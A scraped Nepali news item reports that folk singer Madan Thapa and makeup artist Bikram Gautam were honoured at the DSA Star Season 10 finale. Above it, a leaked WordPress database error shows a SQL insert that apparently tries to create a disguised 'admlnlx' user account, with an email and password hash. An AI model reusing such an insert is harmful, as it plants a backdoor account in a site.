WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BU7iNl2TxWvTeWYoGWheOvVOC6C4wb/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 06:56:32', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । लोक गायक मदन थापा र शृगारकर्मी बिक्रम गौतम गोल्ड राष्ट्रिय अवार्ड २०२३ द्वारा सम्मानित भएका छन ।
थापा वर्ष लोक गायक र गौतमलाई बर्ष शृगार द्धारा सम्मानित भएको हो ।

परिवर्तन इभेन्ट हाउसद्धारा नाचघरमा शनिबार आयोजित डान्सिङ, सिङगिङ एण्ड एक्टिङ स्टार सिजन १० को ग्रान्ड फिनाले कार्यक्रममा सम्मानित गरिएको हो ।
सोही कार्यक्रमा बर्ष ड्रोन मा भिम तामाङ, बर्ष संगीतकारमा शशी बिक्रम थापा समानित भएका छन ।
नेपाल ललितकला प्रज्ञा(प्रतिष्ठानका कुलपती नारदमनी हार्तम्छलिको प्रमुख अतिथ्यामा डि एस ए स्टार को दशौ सस्करण २०८० कार्यक्रम सम्पन्न भएको थियो ।